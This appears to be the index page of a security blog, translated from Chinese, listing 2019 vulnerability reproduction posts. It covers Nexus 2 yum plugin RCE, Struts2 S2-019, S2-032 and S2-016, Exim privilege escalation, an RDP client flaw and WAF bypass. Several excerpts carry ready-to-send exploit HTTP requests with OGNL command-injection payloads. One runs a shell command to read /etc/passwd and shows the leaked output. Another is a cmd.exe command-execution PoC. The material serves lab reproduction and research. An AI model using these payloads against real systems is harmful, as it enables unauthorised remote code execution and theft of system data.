September 23, 2019
CVE-2019-5475 Nexus 2 yum plugin RCE vulnerability reproduction. References: [Vulnerability analysis] CVE-2019-5475: Nexus 2 yum plugin remote command execution vulnerability https://mp.weixin.qq.com/s/E_BEp-yYKtIYAnQ6JP7fmg ; CVE-2019-5475: Nexus 2 yum plugin RCE vulnerability reproduction https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247483738&idx=1&sn=6bce2bf153ab0a07c01f746d479644d4&scene=0#wechat_redirect . Environment setup (Windows as the example): 1. Download Nexus-2.14.13 https://download.sonatype.com/nexus/oss/nexus-2.14.13-01-bundle.zip 2. (As administrator) run bin/jsw/windows-x86-64/install-nexus.bat 3. (As administrator) run bin/jsw/windows-x86-64/start-nexus.bat [startup is fairly slow; be patient]; debugging reference https://blog.csdn.net/nthack5730/article/details/51082270 4. Visit http://localhost:8081/nexus to verify that the service is running (default credentials admin/admin123). PoC: the vulnerability requires administrator privileges, so it is a post-auth RCE / authenticated getshell. A tasklist demo: C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\System32\\tasklist.exe & Original HTTP request: PUT /nexus/service/siesta/capabilities/00014aeb0e511dc9 […]
September 12, 2019
Struts2 S2-019 HTTP raw text. Detection request: POST /example/HelloWorld.action HTTP/1.1 Host:192.168.198.133:80 Accept-Language: zh_CN User-Agent: Auto Spider 1.0 Accept-Encoding: gzip, deflate Connection: close Content-Length: 492 Content-Type: application/x-www-form-urlencoded debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22struts2_security_%22),%23resp.getWriter().print(%22check%22),%23resp.getWriter().flush(),%23resp.getWriter().close() Response: HTTP/1.1 200 Set-Cookie: JSESSIONID=339037A73494B91A16B5EC3974F956EC; Path=/; HttpOnly Content-Type: text/plain;charset=ISO-8859-1 Transfer-Encoding: chunked Date: Thu, 12 Sep 2019 07:42:15 GMT Connection: close 16 struts2_security_check 0 Exploitation request: POST /example/HelloWorld.action HTTP/1.1 Host:192.168.198.133:80 Accept-Language: zh_CN […]
September 12, 2019
Analysis of an all-version RCE vulnerability in a certain product (某道) https://xz.aliyun.com/t/6239
September 12, 2019
Struts S2-032 HTTP raw text. Body. Analysis: [![s2-032](http://wp.blkstone.me/wp-content/uploads/2019/09/s2_032_20190912.png "s2-032")](http://wp.blkstone.me/wp-content/uploads/2019/09/s2_032_20190912.png "s2-032") Probe request: POST / HTTP/1.1 Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36 User-Agent: Java/1.8.0_212 Host: 192.168.198.133:8888 Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2 Connection: keep-alive Content-type: application/x-www-form-urlencoded Content-Length: 209 method%3a%23_memberAccess%3d@ognl.OgnlContext+@DEFAULT_MEMBER_ACCESS%2c%23kxlzx%3d+@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%2888888888-1%29%2c%23kxlzx.close Response: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 9 Date: Thu, 12 Sep 2019 04:07:32 GMT 88888887 Decoded OGNL: method:#_memberAccess=@ognl.OgnlContext+@DEFAULT_MEMBER_ACCESS,#kxlzx=+@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#kxlzx.println(88888888-1),#kxlzx.close Exploitation request: POST […]
September 11, 2019
Struts S2-016 HTTP raw text. Exploitation request: POST /login.action HTTP/1.1 Cookie: SessionId=96F3F15432E0660E0654B1CE240C4C36 User-Agent: Java/1.8.0_212 Host: 192.168.198.133 Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2 Connection: keep-alive Content-type: application/x-www-form-urlencoded Content-Length: 651 redirect:%24%7B%23resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%28new+java.lang.ProcessBuilder(new+java.lang.String[]{'/bin/sh','-c','cat+/etc/passwd'})).start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23dis%3Dnew+java.io.DataInputStream%28%23b%29%2C%23buf%3Dnew+byte%5B20000%5D%2C%23dis.read%28%23buf%29%2C%23msg%3Dnew+java.lang.String%28%23buf%29%2C%23dis.close%28%29%2C%23resp.getWriter%28%29.println%28%23msg.trim%28%29%29%2C%23resp.getWriter%28%29.flush%28%29%2C%23resp.getWriter%28%29.close%28%29%7D= Response: HTTP/1.1 200 OK Server: nginx/1.12.2 Date: Wed, 11 Sep 2019 07:07:30 GMT Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: JSESSIONID=E251191A83A1CD97EE09BD19BC45A877-n1; Path=/ Content-Language: zh-CN 679 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin […]
September 11, 2019
CVE-2019-0788 Microsoft Remote Desktop Client remote arbitrary code execution vulnerability. Body: when the mstsc client connects to a malicious RDP server, the server may execute code remotely on the client. Uses: internal-network phishing; honeypot counter-strike. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0788 https://www.tenable.com/blog/microsofts-september-2019-patch-tuesday-tenable-roundup
September 11, 2019
CVE-2019-1003000 Jenkins RCE PoC or simple pre-auth remote code execution on the Server. Body: https://medium.com/@valeriyshevchenko/jenkins-rce-poc-or-simple-pre-auth-remote-code-execution-on-the-server-d18b868a77cb
September 9, 2019
WAF Attack and Defense Research: Bypassing WAF at Four Levels. Abstract: Research into WAF bypass techniques is a very important part of WAF attack-and-defense research, and also the most interesting part, which is why I am writing the attack side first. As the old saying goes, "if you do not know offense, how can you know defense": if you do not even know the methods for bypassing a WAF, how can you guarantee that the WAF protects the backend services. In my view, research into WAF bypass techniques will continually drive the level of defense upward. Earlier WAF bypass articles read more like collections of cases, all focused on the rule-matching level. Bypassing WAF rules is a head-on confrontation and the weakest approach. Paying attention only to rule-level bypasses narrows one's view and hides the WAF's problems in other areas; by the barrel principle, defensive capability does not fundamentally improve. This article explains WAF bypass techniques at four levels, to raise the WAF's defensive capability across the board. After covering the attack techniques, I will later discuss WAF design architecture and defensive strategy, so that every design consideration is clearly motivated. Bypassing WAF at the architecture level. Bypassing WAF from the resource-limit angle. Bypassing WAF at the protocol level. Bypassing WAF through rule defects. References: https://weibo.com/ttarticle/p/show?id=2309404007261092631700&display=0&retcode=6102
September 6, 2019
CVE-2019-10149 Exim local privilege escalation (LPE). Body: git clone https://github.com/dhn/exploits docker build -t vuln/cve-2019-10149 . docker run --rm -it vuln/cve-2019-10149 Test procedure: team@blackloutus01 >>> ~/develop/vulhub-master/exploits/CVE-2019-10149 > master > sudo su [sudo] password for team: [root@blackloutus01 CVE-2019-10149]# docker run --rm -it vuln/cve-2019-10149 No directory, logging in with HOME=/ $ cd /tmp $ vim sh $ cat /tmp/sh #!/usr/bin/env […]
September 5, 2019
Targeting approaches in internal-network penetration. Body: 17. Summary of target-location techniques in internal-network penetration testing https://blog.csdn.net/Fly_hps/article/details/80644179